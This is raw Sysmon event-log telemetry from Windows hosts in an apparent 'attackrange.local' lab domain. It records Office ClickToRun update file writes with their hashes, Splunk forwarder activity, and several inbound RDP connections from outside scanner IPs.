Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSS7DATA000A.DLLMD5=04AA011C4D2303D7BCA9C16097ED4E2C,SHA256=0101E911842CF40A0EBABBDE56039FA3285FC35382C845C77198521E20B93220,IMPHASH=539A950BB256C5F404F9A4D4F0724001truetrue 23542300x800000000000000069979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSS7DATA0009.DLLMD5=79E7CE04AAF0ACD4AE8B2E617E952DB8,SHA256=9F25E1C1C5AE2F63B531AFA2FB3BA5D2DDB7BB2ECADA61624186AC4B4A412881,IMPHASH=534714B7712400908FDE2E9DD3846065truetrue 23542300x800000000000000069978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CSIRESOURCES.DLLMD5=03DB40B3F805644B8CB5746532327539,SHA256=60A3A9F4BEB006F3F33568224C0C846120B65876251B7093E51C931DC15E412A,IMPHASH=C2878FA8A7BFA6E2A7B98EF07A1CC93Dtruetrue 23542300x800000000000000069977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\csi.dllMD5=7365ED955AF4B6E189F2AAF740898329,SHA256=AA3C888C3F5DA0854998EEAA812E89FC54CB16F13E970F3B28B01B7F4FBE66C8,IMPHASH=877CC27CA1C468EC25361E899E48B25Dtruetrue 23542300x800000000000000069976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\cpprestsdk.dllMD5=E7500B1F69E95E401E7AF98B599AA34F,SHA256=2320312521BC923C7C42776857FA0D8C45688002FD0773D5139CFFD8C9DE130A,IMPHASH=6B49FA129E4E4A52FF7C79AFFE4B9B18truetrue 23542300x800000000000000069975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Cpprest141_2_10.DLLMD5=09E1D49B9B102D7EA0C530098CAE7E57,SHA256=9AB67184668442CB43FF35415461AD80228959BEC39C6017B8DFAB91039577EC,IMPHASH=6471177CCD4C7B952B1B0333988E3777truetrue 23542300x800000000000000069974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONTAB32.DLLMD5=DE7BAE89AD33942B633A1230D5EEE30E,SHA256=CCB0A98608C5D9F787E647B2CA69395127D01BBE3B5884957FC6363923E94C40,IMPHASH=C6D30C2A06DFFCF112CD0F3E485EB055truetrue 23542300x800000000000000069973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\concrt140.dllMD5=EB42B164D603672E07997019BB00E4AD,SHA256=DABDB0732B2FC14040CEDBBFD369D9EB3C7A2E66B38A79892E1C05E6D6A8526D,IMPHASH=E29B9617328962A9B58721E88E2FD959truetrue 23542300x800000000000000069972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CommunicatorContentBinApp.xapMD5=6CE331BCB7125DC7E026F93DCBB10E13,SHA256=B2DE487FF84D520BA51E299FB44E879A1B924C63F538D47B3A006D53AC9AE032,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CNFNOT32.EXEMD5=FFE123FF8DE2E7538B079A050F1CC917,SHA256=4C1AE24839F21748B3AECC96152C5B908C38D27AE16B3902E53610E94C74DD42,IMPHASH=A36324978596E2B169A74747EC4F78A0truetrue 23542300x800000000000000069970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CLVIEW.EXEMD5=DC6796987152A9A802612536EA2768BC,SHA256=FD37C6465162B44B163C7FFA9F95FF928584DF0B9C5139F9E24B0DD9E69C614A,IMPHASH=41977618AC7CA31D21462F6FBF8141CDtruetrue 23542300x800000000000000069969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CHART.DLLMD5=9B368196EC5AEC619C141FDD503CD793,SHA256=0ADC93BFF26B097A168B4F19B5ED75A9007239C656C9DE5C768D040FB9C72811,IMPHASH=562C2B4F3A092A28365A179AA60FE695truetrue 23542300x800000000000000069968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CHAKRACORE.DLLMD5=02836114F7E6C8337FD62902B20001AE,SHA256=8D942362D971E49FF5805C59F9B224C7AC9E4CD8006887D16A4898B271F654CC,IMPHASH=536111B001E7D663FE12B55BE91E738Btruetrue 23542300x800000000000000069967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ChakraCore.Debugger.dllMD5=629E9959B3D12CEB11A67892DA6B6711,SHA256=DAC4C1C3C0DEAC518CA26013C86C5A610DB5257AE93C44DDB43A88F624CB78F3,IMPHASH=73F4D6781A650C08B90EAEDDFA169F44truetrue 23542300x800000000000000069966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BIPLAT.DLLMD5=02188C01F0C8E39BD38BEB249103EB17,SHA256=18F4E7F9D81AD438167C93EDC69296EFFC9774C3F37F2984BE696EF65565D72E,IMPHASH=8F1CFCF838A870E642B786F8F863768Dtruetrue 23542300x800000000000000069965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\bdcmetadataresource.xsdMD5=27B409BC5E400FC72A057D958AAA70DB,SHA256=453B02419AB5BDE385AF81D6CB738317A21DB197F7694876071DD27F9D57B8B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\bdcmetadata.xsdMD5=2241BEE1541CA64D578684A352B1A747,SHA256=91926B18AA0430E45F6B2A26F0A36774D15B45F993E659D4F8D6599F961E97F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AutoHelper.dllMD5=7F2BBE4A20D71D4E1F35F4B20A71C36E,SHA256=94C283C9F8570413FB36B6BAB6A78FC3605D7DA60D99974AABD3520F748CF969,IMPHASH=2AC4599B12D2CED9F4DA887406C83983truetrue 23542300x800000000000000069962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AUDIOSEARCHSAPIFE.DLLMD5=EC7469728A530DEFDF585A601BF578AB,SHA256=C74AB556E1443103289584EB3B317A11F6552FE4729CA58BE88AFDEE0F2AE925,IMPHASH=16FCE47A2A84CAEBA61D6003176D8C4Btruetrue 23542300x800000000000000069961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AUDIOSEARCHMAIN.DLLMD5=2B1CA3311179246ACE104B9F39D842DD,SHA256=6E9F54D850496FCF0EE906FA57FCC3515A9787730D832DCB4A10B5EF61D251DB,IMPHASH=204FD2A4DA4C02D2393BCE91A31C7993truetrue 23542300x800000000000000049763Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:27.929{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC143797F28B343AAAC99A753B8D813F,SHA256=2448B1849FCC877C0E7DC49021C81D19DD23FD77E49B5FCBB8ED250420EAE057,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\flat_officeFontsPreview.ttfMD5=223C778C0F523A926D4AB55E9E9774C1,SHA256=FE8EEF60CB59D4369A956AF3D48E00681E3003F0F7CB966702041101248FAC55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FilterModule.dllMD5=CD4C9D605D186B0EE1C3BECE93D222ED,SHA256=883C90C869C9459BAB05C0A7AEAAD25D05BD15B48D36D669168562CA3E7E8520,IMPHASH=CFB3CAB1C0397A67C80B55D28F8C3BC1truetrue 23542300x800000000000000070013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExtensibleApp.xapMD5=42711D2F00FD081E237EB1CD1F7D2B1D,SHA256=B50FB1A4BC5A77911CCD0B18C13255B3FBFAD7A4E605EA1C9891A2EA306F4D33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EXSEC32.DLLMD5=A53E2AA363713172377E7C9927DBD51D,SHA256=9912ED1A36747BD4CE7EDD660E977B252310981E92842D0732540A452ADC9F3B,IMPHASH=7E213BA7168831953F7C3F4CE22E7E0Dtruetrue 23542300x800000000000000070011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelTellMeOnnxModel.binMD5=D96E6048C0973D9C99C257D38757ED7F,SHA256=D5C257C59573418608CBD2700CDAA17C970EFE7C63FC89293498656C4522B49B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelInterProviderRanker.binMD5=D4CD9289C489309764F1F2C982AAAF8E,SHA256=C4B44B55C88110047A170BF0483ACA7F163CB967D60D9F8668CB9CD98D634A96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelFloatieXLEditTextModel.binMD5=504D640A9E3D7BF31FB5616243C0BBE0,SHA256=37D5ACEB3E69B44BA78D5941DCE309B5D5197DCBC65814B0226A1A4BBE1C9657,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelFloatieTextModel.binMD5=844D7A4173E5706173AE14047D542080,SHA256=F7EC6BA9E8EBDE61B0482B2285B46A6640CD7915590BE3AFDFD924EFA2A98647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelCtxUIFormulaBarModel.binMD5=CF638D6EF9781FE8B55973753222058F,SHA256=EFDF382DC1E818F9260B0F52CF42E2838301843907481B1A7417C56749B7B378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelCtxUICellModel.binMD5=92C2F3875DC59C5EDE031DE960939C1B,SHA256=0D702E6E47255DBCA78DC56CE90F0BB0B9601615D859690EB13E3719E22C58C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelCtxUICellLayoutModel.binMD5=0BC827CEB20A635F5DEF2381F820C529,SHA256=193890D277885E579AFD418B7E013B99DF5DE9CF97C4AFA7BFD60CDED87FAB95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ExcelCombinedFloatieModel.binMD5=398DD84EA4D4BFB3B64D3E1D90A97CD6,SHA256=D8C8B378E854BE4F33461F169F07695C73A5090CD0EA169ACC07C2096F48ACA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\excelcnvpxy.dllMD5=22A51689F23FF30E6AA1F302163E6EFB,SHA256=C56F0D0A4B9E8F6F6CE7FDEEDA1327800586FA448CA7D010EDD17F55F56B0A32,IMPHASH=87820713B1E2A07831B5958E42CD72F4truetrue 23542300x800000000000000070002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\excelcnv.exe.manifestMD5=CEBE30BE79D08168FF0567A31504B799,SHA256=47AFB0114CD5019D5361ADD11AFDDADB4289F69CDADFFFDED835C6594E0AC735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\excelcnv.exeMD5=C569406CAA116AF1D840532599B601AA,SHA256=66F0314FA5107EF8C56728B80643E2884B5509E0367D8AED712799C4C106FF04,IMPHASH=8CC409D752C7B5D270A6D0DE5139E7A6truetrue 354300x800000000000000070000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.168{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com64383-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000069999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:27.165{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57503-false10.0.1.12-8000- 354300x800000000000000069998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:26.844{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-37228-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000069997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.296{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-35862-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000069996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EXCEL.VisualElementsManifest.xmlMD5=0D5CBB46753F4B7BBC87132D1EDB3F6E,SHA256=99CD9080624DD82CEB6F11A2994EEB551F8C871ED0A0E27A425CF4D2F6CBFB1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\excel.exe.manifestMD5=4697A1A6E783F7973CF255B7AE77B100,SHA256=1902383C327A13777727257289661C15538150729E5E028D7F26F1E03EB1C1A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:28.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\EXCEL.EXEMD5=030273B0811666BCADF0A87795FCF045,SHA256=78CF95A7569ADF9105EFB7ABB71F43B9CD84E555978B0FCBD5F5E99F8F5CBCC4,IMPHASH=4E6F5C93BD13AD15B8E70AC161E0A896truetrue 23542300x800000000000000049768Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:28.945{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E89D5498B982D711BCF2C9523ED33F,SHA256=FADE26F2FC1E9F70DC463A30948AAADF763511697717A03A5A02E9C41B2ECA52,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049767Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:25.715{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61766-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049766Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:25.542{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58808-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049765Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:24.782{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52499-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049764Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:28.132{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A63C6DF62A99F56559F25A4836D02A6,SHA256=C2591893A1CE406047DD9B28E3DB591B8AA6414F88B1F542F9ABE187BF632034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:29.767{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0FA05E1D10B668997154448541600970,SHA256=820F9D95AA7EAD543151399088C816C9B705617D26622B10A1F2F4197B3B6C50,IMPHASH=00000000000000000000000000000000falsetrue 